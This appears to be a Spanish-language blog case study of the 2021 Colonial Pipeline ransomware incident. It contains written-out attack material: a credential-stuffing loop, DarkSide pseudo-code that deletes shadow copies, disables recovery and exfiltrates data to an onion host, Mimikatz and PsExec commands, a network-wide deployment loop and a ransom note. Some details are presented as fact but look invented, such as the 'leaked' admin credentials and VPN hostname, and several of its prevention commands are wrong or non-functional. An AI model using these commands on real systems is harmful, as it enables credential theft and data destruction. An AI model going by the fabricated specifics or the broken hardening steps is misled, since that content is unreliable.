Colonial Pipeline (2021): Ransomware que detuvo el combustible de EEUU ## El ataque Fecha: 7 de mayo de 2021 Atacante: DarkSide (grupo de ransomware RaaS) Vector: Credenciales comprometidas de VPN (sin MFA) Rescate pagado: $4.4 millones en Bitcoin (75 BTC) Rescate recuperado: $2.3 millones por FBI Impacto: 45% del suministro de combustible de la costa este de EEUU paralizado por 6 días ## Timeline del incidente 29 abril 2021: Acceso inicial vía VPN ↓ 6 mayo 2021: Ransomware desplegado (23:00 ET) ↓ 7 mayo 2021: Colonial descubre cifrado (05:00 ET) ↓ 7 mayo 2021: Cierre preventivo de pipeline (06:00 ET) ↓ 8 mayo 2021: Pago de rescate ($4.4M) ↓ 9 mayo 2021: Estado de emergencia declarado ↓ 12 mayo 2021: Reinicio gradual del pipeline ↓ 13 mayo 2021: Operaciones normales restauradas ↓ 7 junio 2021: FBI recupera $2.3M del rescate ## Vector de ataque inicial ### Credenciales comprometidas python # Credenciales encontradas en dark web Username: colonial_admin Password: P@ssw0rd123 # Sin rotación en 2+ años VPN: legacy-vpn.colonialpipeline.com MFA: Disabled # ← Punto crítico de fallo ¿Cómo se comprometieron? 1. Credential stuffing de bases de datos filtradas previas 2. Password reuse (misma contraseña en múltiples servicios) 3. VPN legacy sin MFA habilitado bash # Ataque típico de credential stuffing for cred in leaked_credentials: try: vpn_connect(cred.username, cred.password, "legacy-vpn.colonialpipeline.com") if success: log_compromised_account(cred) break except: continue ## DarkSide Ransomware ### Características técnicas Lenguaje: C/C++ Modelo: Ransomware-as-a-Service (RaaS) Cifrado: RSA-1024 + Salsa20 Afiliados: 60% del rescate Operadores: 40% del rescate ### Comportamiento del malware csharp // Pseudo-código de DarkSide public class DarkSideRansomware { public void Execute() { // 1. Verificar configuración de país if (IsExcludedCountry()) { Environment.Exit(0); // No ejecutar en Rusia/CIS } // 2. Terminar procesos que bloquean archivos TerminateProcesses(new[] { "sql", "oracle", "ocssd", "dbsnmp", "synctime", "agntsvc", "isqlplussvc", "xfssvccon", "mydesktopservice", "ocautoupds", "encsvc", "firefox", "tbirdconfig", "mydesktopqos", "ocomm", "dbeng50", "sqbcoreservice", "excel", "infopath", "msaccess", "mspub", "onenote", "outlook", "powerpnt", "steam", "thebat", "thunderbird", "visio", "winword", "wordpad" }); // 3. Eliminar Shadow Copies ExecuteCommand("vssadmin.exe delete shadows /all /quiet"); ExecuteCommand("wmic.exe shadowcopy delete"); // 4. Deshabilitar recovery ExecuteCommand("bcdedit.exe /set {default} recoveryenabled no"); ExecuteCommand("bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"); // 5. Exfiltrar datos antes de cifrar ExfiltrateData("important_docs", "http://darkside-exfil.onion"); // 6. Cifrar archivos EncryptFiles(); // 7. Dejar nota de rescate DropRansomNote(); // 8. Cambiar wallpaper SetWallpaper("ransom_wallpaper.bmp"); } private void EncryptFiles() { var extensions = new[] { ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".zip", ".rar", ".7z", ".sql", ".mdb", ".jpg", ".png", ".mp4", ".avi", ".mp3" }; foreach (var file in GetAllFiles(extensions)) { var encryptedData = Encrypt(file.Data, publicKey); File.WriteAllBytes(file.Path + ".darkside", encryptedData); File.Delete(file.Path); } } } ### Nota de rescate ╔══════════════════════════════════════════════════════════╗ ║ YOUR FILES HAVE BEEN ENCRYPTED ║ ╚══════════════════════════════════════════════════════════╝ What happened? --------------- Your network has been penetrated. All files have been encrypted and exfiltrated. Your data will be published on our blog if you do not pay within 48 hours. Data leaked: - Financial records (500GB) - Employee data (PII) - Contracts and agreements - SCADA system documentation How to recover? ---------------- 1. Download Tor Browser: torproject.org 2. Visit: http://darksidedvp3qmxu.onion/ID-XX-COLONIAL 3. Follow payment instructions Price: $4,400,000 USD (75 BTC) Time remaining: 47:23:15 WARNING: Do not contact law enforcement or recovery companies. This will result in immediate data publication and price increase. - DarkSide Team ## Lateral movement y propagación powershell # 1. Reconocimiento de Active Directory net group "Domain Admins" /domain net group "Enterprise Admins" /domain nltest /dclist: # 2. Credential dumping con Mimikatz mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" # 3. Movimiento lateral con PsExec psexec.exe \\DC01 -u domain\admin -p password cmd.exe psexec.exe \\FILE-SERVER01 -u domain\admin -p password cmd.exe # 4. Despliegue de ransomware en red for /L %i in (1,1,254) do start /b psexec.exe \\192.168.1.%i -u admin -p pass -s darkside.exe ## Impacto operacional ### Sistemas afectados - IT corporativo: Completamente cifrado - OT/SCADA: NO cifrado (apagado preventivo) - Billing systems: Cifrado (no podían facturar) - Email: Inaccesible - Backups: Parcialmente comprometidos ### Consecuencias económicas Rescate pagado: $4,400,000 Pérdidas operacionales: ~$90,000,000 Multas regulatorias: TBD Costos de remediación: ~$50,000,000 Daño reputacional: Incalculable TOTAL ESTIMADO: >$150,000,000 ### Impacto social - Pánico en gasolineras: Filas de horas - Precio de gasolina: +20% en costa este - Vuelos cancelados: Escasez de combustible de aviación - Estado de emergencia: Declarado por Biden ## Recuperación del rescate por FBI ### Operación de seguimiento blockchain python # Análisis de transacciones Bitcoin from blockchain_analysis import trace_btc # Wallet de DarkSide attacker_wallet = "bc1qa5wkgaew2dkv56kfvj49j0av5nml45x9ek9hz6" # FBI rastreó: tx1 = "Colonial → DarkSide wallet (75 BTC)" tx2 = "DarkSide → Mixer (attempt)" tx3 = "Mixer → Intermediate wallets" tx4 = "Intermediate → Final wallet" # FBI obtuvo private key de 'Final wallet' recovered_btc = 63.7 BTC # $2.3M al momento de recuperación ¿Cómo lo recuperaron? 1. Análisis blockchain: Rastreo de transacciones 2. Servidor comprometido: FBI accedió a servidor de DarkSide 3. Private key obtenida: Del wallet donde estaban fondos 4. Orden judicial: Seizure de Bitcoin ## Detección y prevención ### Reglas de detección yaml title: DarkSide Ransomware Activity id: 8f3b7dd6-0d2f-4e8a-9c5e-1a2b3c4d5e6f status: stable description: Detecta comportamiento de DarkSide ransomware author: Blue Team date: 2021/05/10 logsource: category: process_creation product: windows detection: selection_vss: CommandLine|contains: - 'vssadmin delete shadows' - 'wmic shadowcopy delete' selection_bcdedit: CommandLine|contains: - 'bcdedit /set' - 'recoveryenabled no' selection_processes: Image|endswith: - '\\vssadmin.exe' - '\\bcdedit.exe' - '\\wbadmin.exe' condition: selection_vss or (selection_bcdedit and selection_processes) falsepositives: - Legitimate system administration level: critical tags: - attack.impact - attack.t1490 ### Prevención powershell # 1. Deshabilitar vssadmin para usuarios normales Set-ExecutionPolicy -Scope LocalMachine -ExecutionPolicy Restricted New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" -Name "DisableSR" -Value 0 # 2. Proteger Shadow Copies vssadmin Resize ShadowStorage /For=C: /On=C: /MaxSize=10GB # 3. Aplicar AppLocker para prevenir ejecución $rule = New-AppLockerPolicy -RuleType Publisher -Path "C:\ProgramData\*" -Action Deny Set-AppLockerPolicy -PolicyObject $rule # 4. Habilitar MFA en TODAS las VPNs Set-VpnConnection -Name "Corporate-VPN" -AuthenticationMethod EAP -MFA $true ## Lecciones críticas 1. MFA es obligatorio - VPN sin MFA = puerta abierta - Colonial tenía MFA pero NO habilitado en VPN legacy 2. Segmentación IT/OT - SCADA no fue cifrado porque estaba segmentado - Pero apagaron todo por precaución 3. Backups offline - Algunos backups fueron comprometidos - Necesidad de backups air-gapped 4. No pagar rescates - Colonial pagó pero decryptor era lento (usaron backups) - Pagar incentiva más ataques 5. Preparación para IR - Tiempo de respuesta fue crítico - Playbooks predefinidos son esenciales --- #ColonialPipeline #DarkSide #Ransomware #InfraestructuraCritica #BlueTeam #IR